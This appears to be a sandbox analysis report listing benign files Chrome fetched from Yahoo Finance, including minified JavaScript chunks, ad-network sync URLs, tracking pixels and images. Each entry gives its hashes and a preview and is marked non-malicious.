                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (8512)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):8513
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.352754076538434
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:+Vk4YMoWbld4UAfsC5JHN9/kdypdTLrmiUcfV:+VkaoWj4PfsCDHfsdGvm3S
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:3B3884BFE7601CF35CB4E4E2C62E2606
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8EE73D1B1B2868EC5F5E929F113C29A95AAB029C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:4575016E6B39FF54B6BBF3DB6E5D16BEDDBC5A399EECBA69B0171F32D869172F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:96956CE5BBFB322DE1715C16C0F68EC0177D094267C23F6451B248368C5A68CA5C8F050EA64EED145CC456C947F17E7E325BE5AA8331151469C7A99A3525B9C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{aa as A,ab as nt,e as R,j as G,ac as rt,ad as at,d as j,k as z,J as ot,ae as it,r as st,a1 as lt,af as ut,ag as K,ah as ft,a2 as ct,ai as ht}from"./commonUtil.CI22_Irn.js";import{l as F,f as $}from"./logUtil.hOue7iAU.js";import{l as Z}from"./loadQuote.D9BAmXuK.js";var dt=200,Q="__lodash_hash_undefined__",pt=1/0,_t="[object Function]",gt="[object GeneratorFunction]",mt=/[\\^$.*+?()[\]{}|]/g,yt=/^\[object .+?Constructor\]$/,bt=typeof A=="object"&&A&&A.Object===Object&&A,wt=typeof self=="object"&&self&&self.Object===Object&&self,U=bt||wt||Function("return this")();function vt(t,e){var n=t?t.length:0;return!!n&&St(t,e,0)>-1}function It(t,e,n,r){for(var i=t.length,a=n+-1;++a<i;)if(e(t[a],a,t))return a;return-1}function St(t,e,n){if(e!==e)return It(t,Ct,n);for(var r=n-1,i=t.length;++r<i;)if(t[r]===e)return r;return-1}function Ct(t){return t!==t}function Lt(t,e){return t.has(e)}function Pt(t,e){return t==null?void 0:t[e]}function Ot(t){var e=!1;if(t!=null&&typeof t.toString!="function"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):73
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.158533976480783
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:OC0hNejBlJQ3iUTGAyKqHFSpo:OC0hNuBlJ9r7HFSK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DBADC387E83B02076E04A8A2CF85ECB9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:1BF9EA18B794977395B9FA1B82095518029580E9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BFF0AB091F3C657D47AF9395C942E0EC12F07B672FD2988854427BBA271C5A23
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:507DBC3D5424D88C0111ADFAC596C6A9B9B906687CD866C872FCAA6CA8846C94ED46986CF36699D1BD3F4709052836A87A4079D4FC083F20C520CAEC4E0A6D24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://gum.criteo.com/sync?c=72&r=2&j=TRC.getRTUS&us_privacy=1YNN&gdpr=0&gdpr_consent=&gdpr_pd=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:TRC.getRTUS({"status":"OK","userid":"ijZZRpTJ8Yej7lohZmdI2brQfBduZ2VL"});
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (2859)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2860
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.441960451870491
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:3l0ywBIoWswc8dbiAbG3/+DUo+ejt23MvkPAAkGcCD3ug+bi3ssTApLvn:uBwhXHCP+3+ejt2cvkYAkBCD3ZuwspLv
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:DDC3D67AD7A283A7C4E8BDE9841C06F5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D9D66663FB2F90B92F1B29226202743C2EED7537
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A5F6F2FE8990342CA73244E3659EF7D868C01874178970E020DCDF09DB473EDB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D6FC97F376918F6F63054DFE0BC4D974C09DD0ABD3E5B398044683B625221E135F485E9546D24FB10CB473C63DE312966B7EF995FEFE052EA79E72F02B0D06C4
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/SectionWithSidebar.CRTXGXbf.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as j,c as I,e as S,b as P,d as E,f as w,j as k,i as g,q as p,U as R,k as L,l as b,F as B,G as F,u as z,g as A,a as D,v as M,y as T}from"./scheduler.Dr9AAxFe.js";import{S as U,i as W,t as v,g as H,a as O,e as J,c as K,b as Q,m as X,d as Y}from"./index.DCSmZEjO.js";import{A as Z}from"./AdGroup.CD4BTzLP.js";import{r as $}from"./resizeUtil.BFOdtaWL.js";import{r as x}from"./ads.DhuB_mth.js";import{O as ee}from"./commonUtil.CI22_Irn.js";const se=t=>({}),V=t=>({}),te=t=>({}),N=t=>({refreshAds:t[5]}),ie=t=>({}),q=t=>({});function G(t){let e,r,f,l,h;const d=t[7].sidebar,n=I(d,t,t[6],V);return l=new Z({props:{ids:t[4],className:"tw-m-0 tw-pb-2"}}),{c(){e=S("div"),r=S("div"),n&&n.c(),f=P(),K(l.$$.fragment),this.h()},l(i){e=E(i,"DIV",{class:!0});var u=w(e);r=E(u,"DIV",{class:!0});var a=w(r);n&&n.l(a),f=k(a),Q(l.$$.fragment,a),a.forEach(g),u.forEach(g),this.h()},h(){p(r,"class","tw-sticky tw-top-32"),p(e,"class","sidebar yf-hvsrhi")},m(i,u){L(i,e,u),b(e,r),n&&n.m(r,null),b(r,f),X(l,r,null)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.5465935642949384
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:YHAXW2Vn:YglVn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:97EFE0B7EE61E154D57E80758BB797D8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:810B4E115FE9F5AE697666FEBF2A9ABF0B21C9EC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EFABBA3678B85FCAB831B778EA2DDAAD1E2A1E952584D3566BC39B7CCB3429D9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:AA02209CF80FC2564CE0DB0BF9F30241E92EA33101B55FFE5E26D617F90B74277AE68D714A7B00C792EF2B88B582E3F299213A5C3C9BF9AFE6C6C1800FC276AF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:{"bakers":[]}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (580)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):779
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.487750587948793
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:2ebxkC6DVU4dxhwVVIEOJlxThUscVvgVQxkHtnYpNnm+lnOBIdNcDgXoQL:2e2C6hHfhiVIr/FdcpytvEdNwg
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A1FB35F9456C943CD1901CB5322BAA74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:923A82F87BF55957D59320AE6F23CBEBD26238AC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:D610C94B19071232066CC3E13F50EBA09077EE8457621D9A81573B75247FC90A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D110AA0C8C256E3AEB34FA49C40E403B3A3DCF12C2A55E0C33FD6437E91BE87BF1F5674D4484472A1E8FD155D0CD9B2BB1CAF6E4FD8D5BE905B1F42F60BA4B4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://yahoo-bidout-d.openx.net/w/1.0/pd?gdpr=0&gdpr_consent=&us_privacy=1YNN
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:<html>.<head><title>Pixels</title></head>.<body>.<script>if("browsingTopics"in document&&document.featurePolicy.allowsFeature("browsing-topics"))document.browsingTopics()</script>..<img src="https://id.rlcdn.com/709996.gif"><img src="https://idpix.media6degrees.com/orbserv/hbpix?pixId=856286&pcv=125&ptid=23&tpuv=00&tpu=474f9349-32a5-168e-8078-cd316ae444da"><img src="https://sync.srv.stackadapt.com/sync?nid=268"><img src="https://b1sync.zemanta.com/usersync/openx?puid=c02f7c85-c1b5-023a-2062-1a006c39da63&cb=https%3A%2F%2Fus-u.openx.net%2Fw%2F1.0%2Fsd%3Fid%3D560843120%26val%3D__ZUID__"><img src="https://rtb.openx.net/sync/dds"><img src="https://sync.ipredictive.com/d/sync/cookie/generic?https://us-u.openx.net/w/1.0/sd?id=537073028&val=${ADELPHIC_CUID}">..</body>.</html>.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):43
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://a3552.casalemedia.com/impression/v2/1057950/85/cs2o9k5lb13sok12g9m0/05ebc881-63ae-43ad-bb79-bf54be58c479?verifieD=1&userID=ZwWEk9HM54wAAGq0ANAUBAAA&cmpro=1449&deviceType=2&expiryTime=1728415528&profileIDs=&creativeID=175c18b&pubID=201422&format=banner&channel=site&ee=1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (594)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):595
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0692321217938465
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:NjlB+hyycBTFFso0//9CEeU/D1+j8D1DTsqBu5GncWfohj:FiEyEs1/VCY1+j8R3sq8qnfmj
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:36435A2DC8947DCE9F97B5D8D8A5FD56
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:07BA48C7A2B0A0C37DCEE25ADA92715FF83020BE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:1FA763CCE52E9B74E986E6B8805A56F865FE56742FA3F57CB62C6AA8A2F50BD1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:9B24B4448AE1096A1C1928C4435C5E506A89591DED681B6FE8180CAD1EFE208D8A6F32DA4D47ABE94D8835382112E919B9B5FB48A8E9054F5803573ACE213E6C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as l,c as i,u as r,g as u,a as f}from"../chunks/scheduler.Dr9AAxFe.js";import{S as _,i as c,t as p,a as m}from"../chunks/index.DCSmZEjO.js";function $(a){let s;const n=a[1].default,e=i(n,a,a[0],null);return{c(){e&&e.c()},l(t){e&&e.l(t)},m(t,o){e&&e.m(t,o),s=!0},p(t,[o]){e&&e.p&&(!s||o&1)&&r(e,n,t,t[0],s?f(n,t[0],o,null):u(t[0]),null)},i(t){s||(p(e,t),s=!0)},o(t){m(e,t),s=!1},d(t){e&&e.d(t)}}}function d(a,s,n){let{$$slots:e={},$$scope:t}=s;return a.$$set=o=>{"$$scope"in o&&n(0,t=o.$$scope)},[t,e]}class S extends _{constructor(s){super(),c(this,s,d,$,l,{})}}export{S as component};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):24
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):3.386842188131012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:AVhcRYD:AVhcRm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:09F71EFBED1212B64851B5A8032EC26F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EC10DB2BD5556DFC406F32AD9DF9944D11B14233
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:89F2D4E6C7A6C41C13C2E7A75E526AA60B9D5274FE28B2D82801C6BEB6BEB879
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:48B0B3A340EE2DC39A346E8CE4C67697F166362CEFC60247848858A011C23C0E14C8914B90BC431CC063EE96FAB113064EA2DBC36988B2CBFB5F54183AA67E1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://csync.loopme.me/?pubid=11331&redirect=https://simage2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM0MzImdGw9MTI5NjAw&piggybackCookie={viewer_token}&gdpr=0&gdpr_consent=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:upstream request timeout
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 356x180, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):13942
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.984970047035467
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:384:Y9TpdDIKv6Us9bR1CF16ZLmYk+tT8oSnNcSbb3gnx:Y9T3DIK7s9uj6lHHT81Ncib3+x
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:BE311FC49C017FDE715939BF1FF7A6E1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:DD35E608629C153F3C5CA3B07ED09200AACBA0B6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:8D1C95CA5320A2615E93CEE999F6275EE78C6F8A29C28852C83E46B9ED9D69A9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8AA874E82687F4DBE67F49DC2203AB50BAF63C35A4E0F520D2C52BDE61DB5D6445E9619410F7BD45BDE4B098FB26679346EE2865FB952A99D5CA9699538C8DFB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s.yimg.com/uu/api/res/1.2/tXAWAMh378MREDEIQWaIbQ--~B/Zmk9c3RyaW07aD0xODA7cT04MDt3PTM1NjthcHBpZD15dGFjaHlvbg--/https://s.yimg.com/os/creatr-uploaded-images/2024-09/857b5ce0-855a-11ef-bdd7-52ddf2ff99a3.cf.webp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:RIFFn6..WEBPVP8 b6.......*d...>y6.H...!(..x...c>F.qc.>..6.7.....D.1......k.~...l;E5..|........x.;...L.....G..J..<......^J.o.........G|...........-v[..dw..'..m..<........>.......x......M@..rt'.W.5.'.1]..pM....~.....`?..H,t.j... ....J....o.b).....jcWc.;..;...;....3VquR(.Ca..x..A...S..%.._.[C.........#.R....-.j...X+....C..........4......v....I=./QJmF....d.....e6...'B~*.... VE.A...n.s.....D..P_..c...u....1P..6.v....Q2.AQ...b..F....R.%e.|T8.C...&..}..g.....Ax...{...,...I.L."!j..{....<.~.Z_,C.... ...S........p+ ..9#a.l_.XMZ..{"...m...E.2.?..KcJ5.n..TP....l.D.#...q.n..2.SL....;.F".w...r..w(B..j.F.......$..Z.W.=.z.z.u.J7...c5...R..U......<3.LW.%/..bo.q.f.]...7z.Cl..Ti...K.t....<.q.n.......T....s....1S-.....5.V....63..b..._..(..M`....}.....5|..b....`q.PK.L..... SCA...P.J.^...}.A.!.9.m... ../_.k....xP.;...)..:..4........V..`..^.6.@/....5.........o..!v.@p,,apJeq..{....Zb..F2.....A.Ol......K.m.Q.a.._.}.`..z...O...L..7D^y.....$.......;}7~..D...c......
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (5471)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):5472
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.4274813795384205
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:TZUQ2F96cISR9kocI5mJBEekHEoN62zIBM9naJ6onYx5Q05YDyjNMLipBkZjaQQo:96Fs4H5WS0oxkBMkJ6X5YmjYiDkZlQNm
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:86CCEE23B169381E3382D89BA5ADFBFA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:2FD89ADCD4FDF3289D6FD4619761523DBCBA6BD0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:984694C0587017BD37FBADB70AA586A1DA58DA3096597B4B1EE1D7263F9A4DDD
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:8468EF8B570E0B56F81CE93CB1CAA432632F932AF067F1FFCEDF6A24B6E0175DAB0D2F296FCF2888A9B81E5FF867E161F891F4001F2D7ECE8A3F61A651BB5C0D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as W,e as M,b as G,d as z,f as E,j as H,i as g,q as h,_ as N,U as w,k as D,l as q,I as X,c as Y,u as Z,g as p,a as x,a6 as A,P as $,t as ee,h as le}from"./scheduler.Dr9AAxFe.js";import{S as te,i as oe,t as b,g as J,a as y,e as K,c as ie,b as ne,m as ae,d as se}from"./index.DCSmZEjO.js";import{A as fe}from"./a11y-dialog.esm.BnYZCIGX.js";import{B as ce}from"./Button.DpT5MMuf.js";import{C as ue}from"./close.C3ug6nNR.js";import{t as L}from"./commonUtil.CI22_Irn.js";const re=o=>({isDisplayed:o&2048}),j=o=>({isDisplayed:o[11]});function de(o){let e;return{c(){e=M("div"),this.h()},l(l){e=z(l,"DIV",{class:!0}),E(e).forEach(g),this.h()},h(){h(e,"class","dialog-overlay yf-1vc3z4o"),w(e,"overlay",o[7])},m(l,t){D(l,e,t)},p(l,t){t&128&&w(e,"overlay",l[7])},d(l){l&&g(e)}}}function me(o){let e;return{c(){e=M("div"),this.h()},l(l){e=z(l,"DIV",{"data-a11y-dialog-hide":!0,class:!0}),E(e).forEach(g),this.h()},h(){h(e,"data-a11y-dialog-hide",""),h(e,"class","dialog-overlay yf-1vc3z4o"),w(e,"overl
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (10637), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10637
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.2085652328167145
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:3rXOcuETuQtQlAQ6g/o5gaDMX5yZ909VeAMg5xmiSvxlAQ60omIcr7Q0QvCjlJlr:3+EiQdgw5TMXoyPMg5xmiwq0Icr78vC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:397B59E3EECA4F747EA1F6FF6323154C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:C96E42A81F2F864313F6592688CA864D4578E3C3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:ACF529F550F2FDAAD913C10E6972344E43E07EAE8D5AA57B96FA30ED7C07ACC1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:CA0F4D6A4FF28A66868BC2387F737073D6CA26A429CBA97CE30B3F86A0820BF0355214618D95CFB5099AF3AF241F50440F3B870BB5C4D26275EFCB93772B8318
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-beacon",[],t):"object"==typeof exports?exports["wafer-beacon"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=e.wafer.wafers||{},e.wafer.wafers["wafer-beacon"]=t())}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(r[n])return r[n].exports;var i=r[n]={i:n,l:!1,exports:{}};return e[n].call(i.exports,i,i.exports,t),i.l=!0,i.exports}var r={};return t.m=e,t.c=r,t.d=function(e,r,n){t.o(e,r)||Object.defineProperty(e,r,{configurable:!1,enumerable:!0,get:n})},t.n=function(e){var r=e&&e.__esModule?function(){return e.default}:function(){return e};return t.d(r,"a",r),r},t.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},t.p="https://s.yimg.com/aaq/wf/",t(t.s="./src/entry.js")}({"./src/entry.js":function(e,t,r){"use strict";function n(e,t){if(!(e instanceof t))throw new TypeError("Cannot call a class as a function")}func
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2402
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.749351816749042
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:D8M000NIxT7F2KSlWLurYa3rTcyh6pPB1RjfrjoCaBWvpZ:D8M007T7ioUA06ppDU6P
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:2E3D1CB92BFB8542BE1AFB8679C4D994
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:9A50F84E17FC9FDFE04AACF6F1340F0E5EB3FEEB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:214146DE3EB7957C6FFEAF639E0C04FC5A4E9B9F127E263D8139B3134CD44DF5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:E8311EFD8DB347E255443291D5CC82FB0ECD1BEF75443862FF72C717B3A66C70F8FCDB5A7BBF855EB465FA8E99812AB1259E6F7888893A80E431D5D75AD892EA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/1975.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............PLTEGpL2]....2\.3].??.3\....3\.UU....2].2].$..2]....3\..U.3\.2[.2\.3[.3\.4_.3^....0\.3\.3].UU.3].4_..U.3_.1\.3].4^..\.3\.3^.2\.2].3f.3^.3\.2].4].2\.3\.2\.3^.2^.3^.4\.3`.2^.2^.3].3].3\.2\.2].3].1].2].1].3].4_.4^.3\.2\.1Y.0a..\.3\.4_.3_.3].4^.3^.-[.3].3_.4^.3^.1\.3\.2\.3].1^.1].4].1X.0a.4_.4^.3^.4_.2[.2\.3_.3\.5].4].3].2].4].2].3]....4^..../Z.......5_.6_.*V.6`.]........%R.5^.5a.......6b.7d.5a.0[.'T.-Y.'S.)U.7d.-X.2\.8a.,W.6c.4^.3^.&R.5_.4].+W.4`.5`.(T.5`.6c.7d....&S.6c....7c....3].Kp.Jo.....\}.4^.`..d.._..Sw....{..4_...(U.......=e.(U..........Wy.Ru.q.....4_.3^...........7e........l.....+V...7c...v......X.7`.6_.........Fk.v...5b.:c.......:b....0Z....(T.......6d.............Fl.Gm.........k....4_..g....ltRNS.....................(...)......a....w..A..]..^..mk.......?.b.....,......w........bb.*...kn.x?x...I..]....IDATX.W.W.Y.~!.L.E.....H..zX{.m{.u....w.@. t.%..V,.....6t..{...a.L2af2.....93..w.{.~...."@?^......$.)I.....P...x.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):33420
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.834940113098819
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
